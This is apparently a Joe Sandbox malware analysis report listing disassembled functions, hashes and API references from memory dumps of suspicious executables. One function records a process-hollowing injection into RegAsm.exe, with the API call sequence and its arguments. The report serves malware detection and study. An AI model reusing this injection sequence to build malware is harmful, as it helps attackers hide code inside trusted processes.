Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: std::ios_base::clear
String ID: c[A
API String ID: 1443086396-3980679666
Opcode ID: 95860eb03becb8723b001c641f5228f6b7c6a6bfb6d92c5c8f8a8b04b6f4d650
Instruction ID: 99249ab2a96b0c4a35e75ad57f5a14d0666851b6228f74897920b8a0745283d6
Opcode Fuzzy Hash: 95860eb03becb8723b001c641f5228f6b7c6a6bfb6d92c5c8f8a8b04b6f4d650
Instruction Fuzzy Hash: 1891D5B4E08249CFDB14CF95C495AEEFBB1BF48314F24815AD9166B391C738A982CF94

Function 00549029 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Replicator::operator[].LIBCMT ref: 00549084
DName::DName.LIBVCRUNTIME ref: 005491CF

Strings

..., xrefs: 00549186

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: NameName::Replicator::operator[]
String ID: ...
API String ID: 3707554701-440645147
Opcode ID: a01b4b22351bc9d90848155d3c3f8c5a7721c8d058e1d1aa57873496cbf7ea09
Instruction ID: 624507bb90be92a33eb7ffec281aefeedb90304f70ce32e58fa6186cfe226072
Opcode Fuzzy Hash: a01b4b22351bc9d90848155d3c3f8c5a7721c8d058e1d1aa57873496cbf7ea09
Instruction Fuzzy Hash: EA51EE709042469EDB25CFA8D88E6EFBFF4BB5A308F04846ED955A7391C7359A08CB50

Function 0041FDE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCONCRTD ref: 0041FF7F

Strings

parse_error, xrefs: 0041FE0D, 0041FE3C
parse error, xrefs: 0041FE63, 0041FE92

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: std::exception::exception
String ID: parse error$parse_error
API String ID: 2807920213-1820534363
Opcode ID: c3e086383ae5e6746f4e929e96e7b47db0ce7f2a8a831da775b4c0686540b5a3
Instruction ID: dbc7e88c930106883de65f009fb68dc6d8aa6a240a0e2e8309194fed98a0f7f7
Opcode Fuzzy Hash: c3e086383ae5e6746f4e929e96e7b47db0ce7f2a8a831da775b4c0686540b5a3
Instruction Fuzzy Hash: F151EE75D00248AFCB04DF95D891AEEBBB5BF48304F10C19EE90A6B351DB746A85CF94

Function 00548716 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00548816

Part of subcall function 005444DA: shared_ptr.LIBCMT ref: 005444F6

Strings

amp, xrefs: 005487B2
cpu, xrefs: 005487C1

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: NameName::shared_ptr
String ID: amp$cpu
API String ID: 2125921051-2542064945
Opcode ID: 3deb029589026f158f5dfa05afecc3c861656cb5e50e3f143fe27a08a4a62530
Instruction ID: 896c4ba004cd65ef6f763240b3cdf26fd80aec3528ec41c2a5a41c97531dc988
Opcode Fuzzy Hash: 3deb029589026f158f5dfa05afecc3c861656cb5e50e3f143fe27a08a4a62530
Instruction Fuzzy Hash: 96318E75D002199FCB08DF98D855AFEBFF4FB89308F50946AE545A7281DB309A44CF90

Function 00547206 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 0054721D
DName::DName.LIBVCRUNTIME ref: 005472A2

Strings

A, xrefs: 00547282

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: NameName::
String ID: A
API String ID: 1333004437-3554254475
Opcode ID: a03ef680b9cb1b220ebf54a6322b2d276013e43f7fe24a9ca7688f7eb00eaf59
Instruction ID: cfba32f82a06b1ae547287a4b51561787bedcfb965af2065dbc01e39e5182c2b
Opcode Fuzzy Hash: a03ef680b9cb1b220ebf54a6322b2d276013e43f7fe24a9ca7688f7eb00eaf59
Instruction Fuzzy Hash: 98219D78908209AFDF04DFA4EC06AEC7FB1FB49308F148499F9459B251C7B19A85DF40

Function 0040E300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040E314
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E3C1

Part of subcall function 005400F1: _Yarn.LIBCPMT ref: 00540110
Part of subcall function 005400F1: _Yarn.LIBCPMT ref: 00540134

Strings

bad locale name, xrefs: 0040E3CB

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 76ee383a0a995e39bfa16aa8301b5174875aea1b19ae8f83a7f9ccfc5e6fa2fa
Instruction ID: 03bdc895a0f5d6872fa9838c6808d5c4a4255a01d2d8090fabff2f5e12dd2b28
Opcode Fuzzy Hash: 76ee383a0a995e39bfa16aa8301b5174875aea1b19ae8f83a7f9ccfc5e6fa2fa
Instruction Fuzzy Hash: 983128B4E04209DFCB04CF98C991BAEFBB1FF48304F248199D805AB381C7749A41CBA5

Function 004164F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCPMTD ref: 004165CB

Strings

eVA, xrefs: 00416567, 00416545, 00416553, 0041655D
eVA, xrefs: 0041650C, 0041651E, 00416533, 00416591, 0041659D, 004165AA

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: _memcpy_s
String ID: eVA$eVA
API String ID: 2001391462-2010160217
Opcode ID: 840fe47f7f40b0dd22249d9de1a3239d75facf5a1c0f6b941722fd50a3e2e93c
Instruction ID: 9ab3e6916cf0d860965d67e495f956fdb17b34ad4b651c815909af831e30d601
Opcode Fuzzy Hash: 840fe47f7f40b0dd22249d9de1a3239d75facf5a1c0f6b941722fd50a3e2e93c
Instruction Fuzzy Hash: 2531AA74A04208EFDB04CF98D094BEEB7B5BF48344F2481A9D8489B346D775AE85DF94

Function 005459C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00545A06
DName::operator+=.LIBCMT ref: 00545A46

Strings

void, xrefs: 00545A28

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: NameName::Name::operator+=
String ID: void
API String ID: 2247604192-3531332078
Opcode ID: 1a68211051f628c7579dd7c2b5ea19785b96c7caec05f1625b87c04ae9c91e5a
Instruction ID: 1f39a911ced60626433c28cc442ee7e4056fd6b043f7a312c73414e0e6e33478
Opcode Fuzzy Hash: 1a68211051f628c7579dd7c2b5ea19785b96c7caec05f1625b87c04ae9c91e5a
Instruction Fuzzy Hash: 1A1154B594061AABCF05EFA5D889AEEBFB8FF44308F004545E40267282EB705744CF50

Function 00415540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041557C

Strings

`XA, xrefs: 00415569
`@, xrefs: 00415572

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: `XA$`@
API String ID: 323602529-3161672447
Opcode ID: e302d00108528a46a1a35d2a8de7e09fc91640628536632f79a55e4ed24a067c
Instruction ID: 08a490f52de3c5040edce6788ffc0187c784e8b8f2f34fffafd03698af9bd941
Opcode Fuzzy Hash: e302d00108528a46a1a35d2a8de7e09fc91640628536632f79a55e4ed24a067c
Instruction Fuzzy Hash: 59F0FFB1D00209AFCF04DFACD95599DBFB5AB42301F9041A9E405BF345DA35AF50CB95

Function 004155B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004155EC

Strings

`XA, xrefs: 004155D9
`@, xrefs: 004155E2

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: `XA$`@
API String ID: 323602529-3161672447
Opcode ID: a59deb7a67acbc6248ceb8a90021aff4319b00112a47edc3c4de445c96a7d9c2
Instruction ID: 88ab926aff57d90664ab7922b7cb5e9842be8a8fca64f07861ea22d7cb8f09c7
Opcode Fuzzy Hash: a59deb7a67acbc6248ceb8a90021aff4319b00112a47edc3c4de445c96a7d9c2
Instruction Fuzzy Hash: 3AF049B1E00108AFCB04DFACDD559AEBFB0EB81302F508199E404BB345DA35AE50CBA4

Function 004157F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041582C

Strings

`XA, xrefs: 00415819
`@, xrefs: 00415822

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: `XA$`@
API String ID: 323602529-3161672447
Opcode ID: f949b47fbd6e0024f454bf7937cf18c8f160b7d410d04c0916410c561404fd23
Instruction ID: 23a3a7d8c62d0292b920b79e1ea0a251c9e9b4556a0ed5d76f89befb81dade5a
Opcode Fuzzy Hash: f949b47fbd6e0024f454bf7937cf18c8f160b7d410d04c0916410c561404fd23
Instruction Fuzzy Hash: 30F04FB1E0010CEFCB04DFACD95599DBFB0AB81301F9041A9E845BB346DA359E50CB94

Function 00415780 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004157BC

Strings

`XA, xrefs: 004157A9
`@, xrefs: 004157B2

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: `XA$`@
API String ID: 323602529-3161672447
Opcode ID: 9d49c7bd113372ec12445a8242aef31acc07b681a11d04ef2080a64199a2ab69
Instruction ID: 69ef72a416037fdf3149eeaf2e42ed360d816649ee5327dd42f27257b19032d0
Opcode Fuzzy Hash: 9d49c7bd113372ec12445a8242aef31acc07b681a11d04ef2080a64199a2ab69
Instruction Fuzzy Hash: 17F04FB1E00208EFCB04DFE8D95599EBFB4BB41341F208199E404BB355DA31AE50CB95

Function 00549D7D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00549DBD

Strings

LV, xrefs: 00549DA6, 00549DA9
{flat}, xrefs: 00549D9A

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: NameName::
String ID: LV${flat}
API String ID: 1333004437-3196673279
Opcode ID: 805b04ba5fe45dbc9f5681ca1f32bc76c11c8952404d32696616745abd5b6bea
Instruction ID: bd933459744bc577db08b3ea40e9fedb6cd0767b7467071f502a0e930009793d
Opcode Fuzzy Hash: 805b04ba5fe45dbc9f5681ca1f32bc76c11c8952404d32696616745abd5b6bea
Instruction Fuzzy Hash: F5F065B4504209EFD700DF84C857BDB3FE4BB06348F104155AA49DF242DBB0A984DB91

Function 00415860 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041587D

Strings

`XA, xrefs: 0041586A
`@, xrefs: 00415873

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: `XA$`@
API String ID: 323602529-3161672447
Opcode ID: 3a31028c2734aaa7f2df6b62a4badb225951a77dcbd4ca5462a77be9aca45d3f
Instruction ID: 9a51a63163f444b2d5d531d0c02e56d26d9bbaf05a32c5ba3a563b95f0821741
Opcode Fuzzy Hash: 3a31028c2734aaa7f2df6b62a4badb225951a77dcbd4ca5462a77be9aca45d3f
Instruction Fuzzy Hash: 8CE065F5904208EBCB04DF84D9518AD7BB4BB46301F504098F9046B351D6329F10D764

Function 00415A10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00415A43

Strings

`XA, xrefs: 00415A30
`@, xrefs: 00415A39

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: `XA$`@
API String ID: 323602529-3161672447
Opcode ID: a0960f7a3dde3f673cb292974b9c3c2cdc03891b5d4733d1f7e33650c8e19b30
Instruction ID: 07d823033d411da519a8fa3d30cda9104c39d0445e64d8b7c4167539fe653b04
Opcode Fuzzy Hash: a0960f7a3dde3f673cb292974b9c3c2cdc03891b5d4733d1f7e33650c8e19b30
Instruction Fuzzy Hash: D9E01AB4D01108EBCF04EF98D9515ADBFB4EF8630AF600199D944AB341DA716E508BA5

Analysis Process: j6V5568MqaTghErAlfE30BBB.exePID: 7888, Parent PID: 7504COMMON

Executed Functions

Function 01400A49 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b50bba17503471430a5dc7cf88656660517641b21ca38356572aab999a10bc41
Instruction ID: 321eba34e9bf185334a20460e4ac74e88768d2508ad62534134b7549b653a876
Opcode Fuzzy Hash: b50bba17503471430a5dc7cf88656660517641b21ca38356572aab999a10bc41
Instruction Fuzzy Hash: B8812674E002198FEB65DF65C858BEEBBB5FB58314F0080EAD819A73A4DB705E808F50

Function 01401310 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d353f8feb330b4fb977f7b3e8936d7831ec7e3a0444f03f73b842e6dbbc43f2a
Instruction ID: c585febf5a1a60b551a8c04bf844c7cfa7e1e4ab879c23aefd2b102fc29d36e8
Opcode Fuzzy Hash: d353f8feb330b4fb977f7b3e8936d7831ec7e3a0444f03f73b842e6dbbc43f2a
Instruction Fuzzy Hash: 49719E74A01228CFEB64DF64D954B9DBBB6BB49314F1080EAD90EA33A4DB305E84CF51

Function 01407718 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ce07c1e604355d946a88b3906cd647def199617f54fec6bb0d611fc903f81d3
Instruction ID: b1fc9e69e7828536275390b10cd20fd2d4eefae0ccff1b88aae89b7c3b32edc2
Opcode Fuzzy Hash: 9ce07c1e604355d946a88b3906cd647def199617f54fec6bb0d611fc903f81d3
Instruction Fuzzy Hash: DF412374D00209CFDF02DFAAD848AAEBBF5BF48345F00842AD456A73A4E774A945CF52

Function 01407709 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f56cad540ba83730d76c7cd524757eaef297e5a89d6f6731aaa89a5d3452555
Instruction ID: bba31fae41a1042753e1f20bdba2d006acfeec8e4531981e6227093be5048731
Opcode Fuzzy Hash: 6f56cad540ba83730d76c7cd524757eaef297e5a89d6f6731aaa89a5d3452555
Instruction Fuzzy Hash: 0C411274D00208CFDB42DFA9E848AEEBBF5BF49345F00842AD456A73A4E7746945CF52

Function 014075F1 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bd160ef789dafa8d6c6788e90448ac5037b2b7698b270ee981a1029aab83e4b
Instruction ID: 7ac84a7799b5b3704c0ba77813162f41bec0d3f85f74c3c9c281df1fb9471ffd
Opcode Fuzzy Hash: 5bd160ef789dafa8d6c6788e90448ac5037b2b7698b270ee981a1029aab83e4b
Instruction Fuzzy Hash: 33118834D04209CFCB45CFA9D8446AEBBF5FF89311F00846AC80AA3265DB345901CF62

Function 01407600 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da60e86fe11214df6df09062babbb464512d3fdf8b05ef94e52e0e283367c3d1
Instruction ID: 1d765b8dc17f33753c385f12b535c6976f612e2cedb056edbf20e160815d1e3a
Opcode Fuzzy Hash: da60e86fe11214df6df09062babbb464512d3fdf8b05ef94e52e0e283367c3d1
Instruction Fuzzy Hash: 6C113774D00209DFDB04DFAAD8086AEBBF5FF89301F00842AC509A33A4DB705901CF91

Function 01400908 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8044998e5268a683b4e558d817f16652645551e95e12ba311f650e5ab3623970
Instruction ID: 8febefee427ade82d1f5f594517eb6569f19b544791057b66d0d779a2e4e67ef
Opcode Fuzzy Hash: 8044998e5268a683b4e558d817f16652645551e95e12ba311f650e5ab3623970
Instruction Fuzzy Hash: F8018B30949344CFEBA2CBB994547AABBF4EF46368F1080FAC849972A1D7344985CB21

Function 01400818 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62d0fcf23943614e5598fb86e2a63308c4e3fe6bb14a95e4aeaa7bcedb026d75
Instruction ID: 8f078b044aefb6cd42cd283e0e57b6eeef8cbf5da7ae161082dd1f5dbad4d9de
Opcode Fuzzy Hash: 62d0fcf23943614e5598fb86e2a63308c4e3fe6bb14a95e4aeaa7bcedb026d75
Instruction Fuzzy Hash: B6E06D6285D3818FD7A38A75A8147A63FE8BB03255F0205FBD044C71A3E37189408751

Function 014076A9 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a74f5a9386f31e380e606e89ac99093e99c286170757d832e2495f4e4faa3aa
Instruction ID: 4aea9cf2ed7fb65e8052809d1756b849fbd6fa8ed6df1e2e55cab94dea6d562d
Opcode Fuzzy Hash: 8a74f5a9386f31e380e606e89ac99093e99c286170757d832e2495f4e4faa3aa
Instruction Fuzzy Hash: 0CF04930915345CFDB82CFBD98542ADBFF0AF06211F14C4A6C849D3261E7308A408B12

Function 01400918 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41649eae1c46e71f7c65bc6874ad52f48375f72296d7b49ed48da282fac4bfc8
Instruction ID: 4ee04476c231487616e459d13d2db9c199b8b78fe8b7e1a2f5684b6589f63eb2
Opcode Fuzzy Hash: 41649eae1c46e71f7c65bc6874ad52f48375f72296d7b49ed48da282fac4bfc8
Instruction Fuzzy Hash: 39F02B30C04349DFEB62DBB9A40477ABEF8A70234CF4040BAC809D32B5E7314584C751

Function 01400848 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455def93571543b7dd41821d37382e32fbe6e09e0d9bac1dc4ccd74a92020497
Instruction ID: 91249d565f4286f4cb857ab9da4c61547b013a45c4f80f9591c7ea552098147a
Opcode Fuzzy Hash: 455def93571543b7dd41821d37382e32fbe6e09e0d9bac1dc4ccd74a92020497
Instruction Fuzzy Hash: DCE0DF32904704DBE751DFBB9504B1BB6FDBF45281F0084BAE508C3271E770CA008691

Function 01402BB2 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c359eaa5bd585196b9844ef3d0ba4c9150220677b31ea2db8c563af6f14485d
Instruction ID: 0ee8cfe33cbb69cbdeda4c3ceed8e2f0523afdfa8cdfa01394698949c8e9c64e
Opcode Fuzzy Hash: 4c359eaa5bd585196b9844ef3d0ba4c9150220677b31ea2db8c563af6f14485d
Instruction Fuzzy Hash: C1D06CB89042298FCB20CF21C948A98B7B4AB49200F1041E6E50AB6265E6301E81CF14

Function 01400CA7 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bebb20a3ba956093c34a68811e0ab1826a87d059bcc21781d970ce7dbd1c7fde
Instruction ID: 3fa6ff88ee8852a21952a4437566ee327cb8b49051213fd0ccbbdea6533f125c
Opcode Fuzzy Hash: bebb20a3ba956093c34a68811e0ab1826a87d059bcc21781d970ce7dbd1c7fde
Instruction Fuzzy Hash: 0EC08CB0A09084C7DB03CB86D9409AE7AB2E701B21F081822C045635E0E776D8808B25

Analysis Process: JxvL46JFox50ORU3tEsaxZ2Y.exePID: 7896, Parent PID: 7504COMMON

Execution Graph

Execution Coverage:	30.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	21.4%
Total number of Nodes:	28
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02D421A5 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02D42117,02D42107), ref: 02D42314
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02D42327
Wow64GetThreadContext.KERNEL32(000003A8,00000000), ref: 02D42345
ReadProcessMemory.KERNELBASE(000003AC,?,02D4215B,00000004,00000000), ref: 02D42369
VirtualAllocEx.KERNELBASE(000003AC,?,?,00003000,00000040), ref: 02D42394
WriteProcessMemory.KERNELBASE(000003AC,00000000,?,?,00000000,?), ref: 02D423EC
WriteProcessMemory.KERNELBASE(000003AC,00400000,?,?,00000000,?,00000028), ref: 02D42437
WriteProcessMemory.KERNELBASE(000003AC,?,?,00000004,00000000), ref: 02D42475
Wow64SetThreadContext.KERNEL32(000003A8,02C00000), ref: 02D424B1
ResumeThread.KERNELBASE(000003A8), ref: 02D424C0

Strings

ress, xrefs: 02D4222F
CreateProcessA, xrefs: 02D42259
GetP, xrefs: 02D42227
SetThreadContext, xrefs: 02D422CB
GetThreadContext, xrefs: 02D4227F
ReadProcessMemory, xrefs: 02D42292
ResumeThread, xrefs: 02D422E1
VirtualAllocEx, xrefs: 02D422A5
Load, xrefs: 02D421E3
WriteProcessMemory, xrefs: 02D422B8
TerminateProcess, xrefs: 02D423A3
aryA, xrefs: 02D421EB
VirtualAlloc, xrefs: 02D4226C
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 02D42313

Memory Dump Source

Source File: 00000006.00000002.1816821272.0000000002D42000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D42000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d42000_JxvL46JFox50ORU3tEsaxZ2Y.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: 4f61ee13be17144ec8132a991b07d2357b9defb91277d6619e219e4e376e97e2
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: 0FB1D67664028AAFDB60CF68CC80BDA77A5FF88714F158124EA0CAB341D774FA41CB94

Function 01000BD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 294
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03D43590,?,00000001,0000012C,?,?,?,00000000,00000000,?,01000A73,00000001,00000040), ref: 01000FD9

Strings

&S!, xrefs: 01000C67
<1i;, xrefs: 01000DCC

Memory Dump Source

